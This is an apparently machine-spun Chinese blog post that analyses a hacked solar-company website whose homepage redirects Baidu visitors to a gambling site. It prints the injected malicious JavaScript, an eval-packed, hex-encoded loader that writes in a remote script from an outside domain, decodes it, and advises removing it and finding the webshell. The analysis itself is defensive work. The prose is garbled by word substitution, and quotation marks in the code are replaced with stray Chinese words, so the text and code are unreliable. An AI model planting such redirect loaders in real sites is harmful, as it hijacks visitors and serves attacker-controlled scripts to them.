上午上q,刚登上去,老铁跟我讲被陵暴了,网站从百度搜索进去,首页发生跳转到菠菜(博彩)网,开拓公司的说可能是百度的问题,不是我们的问题,这种判断能力我只能说智商堪忧,又是xxxxx的网站开拓公司。

直接进入正题,直接site:www.zyisolar.com
打开头页发生了跳转,到https://www.365da8s.com/zh-cn/这个菠菜,其他页面没有,挟制代码只放在首页,我们直接看代码
如果是无法直接从首页查看源码的情形,那么在浏览器输入view-source:域名 就可以查看网页源码
只须要看头部代码好熟习,黑帽seo这行技能这几年也没什么创新,删除这两行就可以办理基本问题
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(\"大众baidu\"大众) == -1){document.title =\公众中亿光伏-品牌光伏集成商\公众}</script>
<script type=\公众text/javascript\"大众>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\"大众\公众:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l[\"大众\\e\\c\\1\\n\\f\\8\\o\\0\"大众][\"大众\\7\\3\\9\\0\\8\公众](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\m\\4\\8\\d\\6\\0\\8\\j\\0\\5\\h\\a\\k\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\t\\0\\0\\4\\2\\u\\5\\5\\7\\7\\7\\b\\v\\1\\e\\a\\2\\q\\b\\1\\c\\f\\5\\r\\p\\s\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',32,32,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62'.split('|'),0,{}))</script>
Keywords和description进行Unicode解码,结果:
bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(\"大众baidu\"大众) == -1){document.title =\"大众中亿光伏-品牌光伏集成商\"大众}</script>这段意思便是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的
然后我们再来解末了一段代码
前辈行js解压,得出结果
javascript代码办法解密1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 结果 document
2:\x77\x72\x69\x74\x65 结果 write
3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
结果 <script type=\"大众text/javascript\公众 src=\公众https://www.bcdas8.com/365.js\"大众></script>
整段的解密结果便是:
<script type=\"大众text/javascript\"大众> window[\公众document\"大众][\"大众write\公众] ('<script type=\"大众text/javascript\"大众 src=\公众https://www.bcdas8.com/365.js\"大众></script>'); </script>
到了这里全体过程已经很清晰了,虽然我们删除了这段代码但只能暂时办理问题,须要找出webshell,做一个全面的网站和做事器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,以是相对比样比较随意马虎处理
大多数人对网站的理解还勾留在视觉层面,网络安全的主要性反而被忽略,曾经我也主攻过渗透攻防,以打击菠菜(博彩)和成人色情,传销等网站做事器为乐,我涉及这块技能的目的不是为了干点什么,而是为理解决问题。任何公司须要提高对网络安全的重视,找网络开拓公司也要避免入坑